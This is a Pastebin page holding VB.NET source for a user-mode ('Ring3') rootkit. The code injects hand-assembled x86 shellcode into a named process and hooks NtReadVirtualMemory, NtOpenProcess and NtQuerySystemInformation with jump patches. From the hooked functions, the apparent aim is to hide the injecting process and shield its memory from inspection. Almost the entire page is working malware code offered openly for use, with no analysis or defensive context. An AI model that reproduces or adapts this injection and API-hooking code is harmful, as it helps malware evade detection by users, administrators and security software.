API tools faq
paste
Advertisement
rakanturki12222

Rootkit Ring3 --> MrZer0

rakanturki12222
Jul 29th, 2015
1,294
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 15.46 KB | None | 0 0
raw download clone embed print report
  1. Module VbRootkit
  2.  
  3.     '*****************
  4.     'Creator Menalix
  5.     'Site: Menalix.com
  6.     '*****************
  7.  
  8. #Region "WinAPI's"
  9.  
  10.     Private Declare Function CloseHandle Lib "kernel32" (ByVal pHandle As IntPtr) As Boolean
  11.     Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Integer, ByVal bInheritHandle As Boolean, ByVal dwProcessId As UInteger) As IntPtr
  12.     Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, <Runtime.InteropServices.Out()> ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesRead As UInteger) As Boolean
  13.     Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesWritten As UInteger) As Boolean
  14.     Private Declare Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UInteger, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
  15.  
  16.     Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
  17.     Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
  18.     Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As UInteger, ByVal u32ProcessId As UInteger) As IntPtr
  19.  
  20.     Private Declare Function VirtualAllocEx Lib "kernel32" ( _
  21.     ByVal hProcess As IntPtr, _
  22.     ByVal lpAddress As IntPtr, _
  23.     ByVal dwSize As UInteger, _
  24.     ByVal flAllocationType As UInteger, _
  25.     ByVal flProtect As UInteger) As IntPtr
  26.  
  27. #End Region
  28.  
  29. #Region "Structures"
  30.  
  31.     Structure MODULEENTRY32
  32.         Dim U32Size As UInteger
  33.         Dim Th32ModuleId As UInteger
  34.         Dim Th32ProcessId As UInteger
  35.         Dim GlblcntUsage As UInteger
  36.         Dim ProccntUsage As UInteger
  37.         Dim ModBaseAddr As IntPtr
  38.         Dim ModBaseSize As UInteger
  39.         Dim HModule As IntPtr
  40.         <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=256)> Dim SzModule As String
  41.         <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=260)> Dim SzeExePath As String
  42.     End Structure
  43.  
  44. #End Region
  45.  
  46.  
  47.     Sub Main()
  48.         Console.Title = "Hook Test Application"
  49.         Console.WriteLine("Press enter, and the hook will be done!")
  50.         Console.ReadLine()
  51.         HookApplication("Process Name")
  52.         Console.ReadLine()
  53.     End Sub
  54.  
  55.     Private Function ReadMemoryByte(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal nSize As UInteger) As Byte()
  56.  
  57.         Dim Buffer(CInt(nSize - 1)) As Byte
  58.         ReadProcessMemory(hProcess, lpBaseAddress, Buffer, nSize, Nothing)
  59.         Return Buffer
  60.  
  61.     End Function
  62.  
  63.     Private Function RemoteGetProcAddressManual(ByVal hProcess As IntPtr, ByVal ModuleAddress As UInteger, ByVal Export As String) As UInteger
  64.  
  65.         'PE Header relative declarations
  66.         Dim PEHeaderOffset As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + &H3C, IntPtr), 4), 0)
  67.         Dim ExportRVA As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + PEHeaderOffset + &H78, IntPtr), 4), 0)
  68.         Dim IExportDir() As Byte = ReadMemoryByte(hProcess, CType(ModuleAddress + ExportRVA, IntPtr), 40)
  69.         Dim NamesCnt As Integer = BitConverter.ToInt32(IExportDir, 24)
  70.         Dim Names As UInteger = BitConverter.ToUInt32(IExportDir, 32) + ModuleAddress
  71.         Dim FuncAddress As UInteger = BitConverter.ToUInt32(IExportDir, 28) + ModuleAddress
  72.         Dim Ordinals As UInteger = BitConverter.ToUInt32(IExportDir, 36) + ModuleAddress
  73.  
  74.         'Empty declarations to use later
  75.         Dim tpAddress, ApiAddress, Ord As UInteger
  76.         Dim ApiString As String = Nothing
  77.         Dim Ptr As IntPtr = Runtime.InteropServices.Marshal.AllocHGlobal(64)
  78.  
  79.         'Searching for the Export
  80.         For i = 1 To NamesCnt
  81.             tpAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(Names + ((i - 1) * 4), IntPtr), 4), 0)
  82.             Runtime.InteropServices.Marshal.Copy(ReadMemoryByte(hProcess, CType(ModuleAddress + tpAddress, IntPtr), 64), 0, Ptr, 64)
  83.             ApiString = Runtime.InteropServices.Marshal.PtrToStringAnsi(Ptr)
  84.             Ord = BitConverter.ToInt16(ReadMemoryByte(hProcess, CType(Ordinals + ((i - 1) * 2), IntPtr), 2), 0)
  85.             ApiAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(FuncAddress + (Ord * 4), IntPtr), 4), 0) + ModuleAddress
  86.  
  87.             If String.Compare(ApiString, Export, True) = 0 Then
  88.                 Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
  89.                 Return ApiAddress
  90.             End If
  91.  
  92.         Next
  93.  
  94.         Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
  95.         Return Nothing
  96.  
  97.     End Function
  98.  
  99.     Private Function GetModuleBaseAddress(ByVal strProcess As String, ByVal strModule As String) As IntPtr
  100.         Dim hSnapshot As IntPtr = CreateToolhelp32Snapshot(&H18, CUInt(Diagnostics.Process.GetProcessesByName(strProcess)(0).Id))
  101.         If hSnapshot = Nothing Then Return Nothing
  102.         Dim me32Modules As New MODULEENTRY32
  103.         me32Modules.U32Size = CUInt(Runtime.InteropServices.Marshal.SizeOf(me32Modules))
  104.         If Module32First(hSnapshot, me32Modules) Then
  105.             Do
  106.                 If Not me32Modules.ModBaseAddr.ToInt64 > &H7FFFFFFF Then
  107.                     If String.Compare(strModule, me32Modules.SzModule, True) = 0 Then Return me32Modules.ModBaseAddr
  108.                 Else
  109.                 End If
  110.             Loop While (Module32Next(hSnapshot, me32Modules))
  111.         End If
  112.         Return Nothing
  113.     End Function
  114.  
  115.     Private Function CalculateOffset(ByVal DesAddress As Integer, ByVal SrcAddress As Integer) As Integer
  116.         Return (DesAddress - SrcAddress) - 5
  117.     End Function
  118.  
  119.     Sub HookApplication(ByVal ProcessName As String)
  120.         Const VariablesSize As Integer = 96
  121.         Dim ProcessHandle As IntPtr
  122.         Dim MemoryBlockPtr As UInteger
  123.         Dim Variables() As Byte = New Byte(VariablesSize) {}
  124.         Dim fpGetProcessId As UInteger
  125.         Dim fpGetCurrentProcessId As UInteger
  126.         Dim lpProtectedAddress(3) As UInteger
  127.         Dim ProtectedBuffer(3)() As Byte
  128.         Dim OldProtect As UInteger = Nothing
  129.         Dim WriteOffset As UInteger = Nothing
  130.         Dim JmpOpCode() As Byte = {&HE9, Nothing, Nothing, Nothing, Nothing}
  131.         Dim OpCodes()() As Byte = {NtReadVirtualMemory_AsmOpCode, NtOpenProcess_AsmOpCode, NtQuerySystemInformation_AsmOpCode}
  132.         Dim OpCodesSize As UInteger = OpCodes(0).Length + OpCodes(1).Length + OpCodes(2).Length
  133.  
  134.         'Alloc memory for our opcode and variables
  135.         ProcessHandle = OpenProcess(&H8 + &H10 + &H20, False, CUInt(Diagnostics.Process.GetProcessesByName(ProcessName)(0).Id))
  136.         MemoryBlockPtr = CInt(VirtualAllocEx(ProcessHandle, Nothing, OpCodesSize + VariablesSize, &H3000, &H40))
  137.  
  138.         'Fill-in variables
  139.         fpGetProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetProcessId"))
  140.         fpGetCurrentProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetCurrentProcessId"))
  141.         lpProtectedAddress(0) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtReadVirtualMemory"))
  142.         lpProtectedAddress(1) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtOpenProcess"))
  143.         lpProtectedAddress(2) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtQuerySystemInformation"))
  144.         ProtectedBuffer(0) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), 24)
  145.         ProtectedBuffer(1) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), 24)
  146.         ProtectedBuffer(2) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), 24)
  147.         BitConverter.GetBytes(fpGetProcessId).CopyTo(Variables, 0)
  148.         BitConverter.GetBytes(fpGetCurrentProcessId).CopyTo(Variables, 4)
  149.         BitConverter.GetBytes(Diagnostics.Process.GetCurrentProcess.Id).CopyTo(Variables, 8)
  150.         BitConverter.GetBytes(lpProtectedAddress(0)).CopyTo(Variables, 12)
  151.         BitConverter.GetBytes(lpProtectedAddress(1)).CopyTo(Variables, 16)
  152.         BitConverter.GetBytes(lpProtectedAddress(2)).CopyTo(Variables, 20)
  153.         ProtectedBuffer(0).CopyTo(Variables, 24)
  154.         ProtectedBuffer(1).CopyTo(Variables, 24 + 24)
  155.         ProtectedBuffer(2).CopyTo(Variables, 24 + 24 + 24)
  156.  
  157.         'Write variables and opcode to memory block
  158.         WriteOffset = MemoryBlockPtr
  159.         WriteProcessMemory(ProcessHandle, WriteOffset, Variables, VariablesSize, Nothing)
  160.         WriteOffset += VariablesSize
  161.         For i = 0 To OpCodes.Length - 1
  162.             WriteProcessMemory(ProcessHandle, WriteOffset, OpCodes(i), CUInt(OpCodes(i).Length), Nothing)
  163.             WriteOffset += OpCodes(i).Length
  164.         Next
  165.  
  166.         'Set memory page to execute code
  167.         VirtualProtectEx(ProcessHandle, MemoryBlockPtr, OpCodesSize + VariablesSize, &H10, 0)
  168.  
  169.         'Hook ZwReadVirtualMemory
  170.         WriteOffset = MemoryBlockPtr + VariablesSize
  171.         BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(0))).CopyTo(JmpOpCode, 1)
  172.         VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
  173.         WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
  174.         VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
  175.  
  176.         'Hook ZwOpenProcess
  177.         WriteOffset += OpCodes(0).Length
  178.         BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(1))).CopyTo(JmpOpCode, 1)
  179.         VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
  180.         WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
  181.         VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
  182.  
  183.         'Hook ZwQuerySystemInformation
  184.         WriteOffset += OpCodes(1).Length
  185.         BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(2))).CopyTo(JmpOpCode, 1)
  186.         VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
  187.         WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
  188.         VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
  189.  
  190.         ' clean up
  191.         CloseHandle(ProcessHandle)
  192.  
  193.     End Sub
  194.  
  195. #Region "AsmOpCode"
  196.  
  197.     Private NtReadVirtualMemory_AsmOpCode As Byte() = { _
  198. &H55, &H8B, &HEC, &H83, &HEC, &H14, &H56, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, _
  199. &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &HFF, &H75, &H18, &HFF, _
  200. &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, _
  201. &H18, &HFF, &HD0, &H89, &H45, &HF8, &H83, &H7D, &HF8, &H0, &HF, &H8C, &HA8, &H0, &H0, &H0, _
  202. &HFF, &H75, &H8, &H8B, &H45, &HFC, &HFF, &H10, &H8B, &HF0, &H8B, &H45, &HFC, &HFF, &H50, &H4, _
  203. &H3B, &HF0, &H74, &HA, &H83, &H7D, &H8, &HFF, &HF, &H85, &H8A, &H0, &H0, &H0, &H83, &H65, _
  204. &HF4, &H0, &HEB, &H7, &H8B, &H45, &HF4, &H40, &H89, &H45, &HF4, &H83, &H7D, &HF4, &H3, &H73, _
  205. &H77, &H8B, &H45, &HF4, &H8B, &H4D, &HFC, &H83, &H7C, &H81, &HC, &H0, &H74, &H65, &H8B, &H45, _
  206. &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H3B, &H45, &HC, &H72, &H56, &H8B, &H45, &HC, _
  207. &H3, &H45, &H14, &H8B, &H4D, &HF4, &H8B, &H55, &HFC, &H39, &H44, &H8A, &HC, &H73, &H44, &H8B, _
  208. &H45, &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H2B, &H45, &HC, &H89, &H45, &HF0, &H83, _
  209. &H65, &HEC, &H0, &HEB, &H7, &H8B, &H45, &HEC, &H40, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H18, _
  210. &H73, &H21, &H8B, &H45, &HF4, &H6B, &HC0, &H18, &H8B, &H4D, &HFC, &H8D, &H44, &H1, &H18, &H8B, _
  211. &H4D, &HEC, &H3, &H4D, &HF0, &H8B, &H55, &H10, &H8B, &H75, &HEC, &H8A, &H4, &H30, &H88, &H4, _
  212. &HA, &HEB, &HD2, &HE9, &H7C, &HFF, &HFF, &HFF, &H8B, &H45, &HF8, &H5E, &HC9, &HC2, &H14, &H0}
  213.  
  214.     Private NtOpenProcess_AsmOpCode As Byte() = { _
  215. &H55, &H8B, &HEC, &H51, &H51, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, &H0, &H0, _
  216. &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &H83, &H7D, &H14, &H0, &H74, &H16, _
  217. &H8B, &H45, &H14, &H8B, &H4D, &HFC, &H8B, &H0, &H3B, &H41, &H8, &H75, &H9, &HC7, &H45, &HF8, _
  218. &H22, &H0, &H0, &HC0, &HEB, &H17, &HFF, &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, _
  219. &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, &H30, &HFF, &HD0, &H89, &H45, &HF8, &H8B, &H45, &HF8, _
  220. &HC9, &HC2, &H10, &H0}
  221.  
  222.     Private NtQuerySystemInformation_AsmOpCode As Byte() = { _
  223. &H55, &H8B, &HEC, &H83, &HEC, &H1C, &H56, &H57, &HC7, &H45, &HEC, &H1, &H0, &H0, &HC0, &HE8, _
  224. &H0, &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HF0, &HFF, &H75, &H14, _
  225. &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HF0, &H83, &HC0, &H48, &HFF, _
  226. &HD0, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H0, &HF, &H8C, &H4E, &H1, &H0, &H0, &H83, &H7D, _
  227. &H8, &H5, &H75, &H5D, &H83, &H65, &HF8, &H0, &H8B, &H45, &HC, &H89, &H45, &HF4, &H8B, &H45, _
  228. &HF4, &H83, &H38, &H0, &H74, &H46, &H8B, &H45, &HF4, &H89, &H45, &HF8, &H8B, &H45, &HF8, &H8B, _
  229. &H4D, &HF8, &H3, &H8, &H89, &H4D, &HF4, &H8B, &H45, &HF4, &H8B, &H4D, &HF0, &H8B, &H40, &H44, _
  230. &H3B, &H41, &H8, &H75, &H25, &H8B, &H45, &HF4, &H83, &H38, &H0, &H75, &H8, &H8B, &H45, &HF8, _
  231. &H83, &H20, &H0, &HEB, &HF, &H8B, &H45, &HF8, &H8B, &H0, &H8B, &H4D, &HF4, &H3, &H1, &H8B, _
  232. &H4D, &HF8, &H89, &H1, &H8B, &H45, &HF8, &H89, &H45, &HF4, &HEB, &HB2, &HE9, &HEB, &H0, &H0, _
  233. &H0, &H83, &H7D, &H8, &H10, &HF, &H85, &HE1, &H0, &H0, &H0, &H8B, &H45, &HC, &H89, &H45, _
  234. &HFC, &H83, &H65, &HE8, &H0, &HEB, &H7, &H8B, &H45, &HE8, &H40, &H89, &H45, &HE8, &H8B, &H45, _
  235. &HFC, &H8B, &H4D, &HE8, &H3B, &H8, &HF, &H83, &HC0, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, _
  236. &HE0, &H4, &H8B, &H4D, &HFC, &H8B, &H55, &HF0, &H8B, &H44, &H1, &H4, &H3B, &H42, &H8, &HF, _
  237. &H85, &HA2, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, _
  238. &H1, &H9, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H10, _
  239. &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H33, &HC9, &H8B, &H55, &HFC, &H66, &H89, &H4C, &H2, _
  240. &HA, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &HC, &H0, &H8B, _
  241. &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, &H1, &H8, &H0, &H8B, &H45, &HE8, _
  242. &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H4, &H0, &H8B, &H45, &HE8, &H89, &H45, _
  243. &HE4, &HEB, &H7, &H8B, &H45, &HE4, &H40, &H89, &H45, &HE4, &H8B, &H45, &HFC, &H8B, &H4D, &HE4, _
  244. &H3B, &H8, &H73, &H21, &H8B, &H45, &HE4, &H40, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H74, _
  245. &H1, &H4, &H8B, &H45, &HE4, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H7C, &H1, &H4, &HA5, _
  246. &HA5, &HA5, &HA5, &HEB, &HCE, &H8B, &H45, &HFC, &H8B, &H0, &H48, &H8B, &H4D, &HFC, &H89, &H1, _
  247. &H8B, &H45, &HE8, &H48, &H89, &H45, &HE8, &HE9, &H2B, &HFF, &HFF, &HFF, &H8B, &H45, &HEC, &H5F, _
  248. &H5E, &HC9, &HC2, &H10, &H0}
  249.  
  250. #End Region
  251.  
  252. End Module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!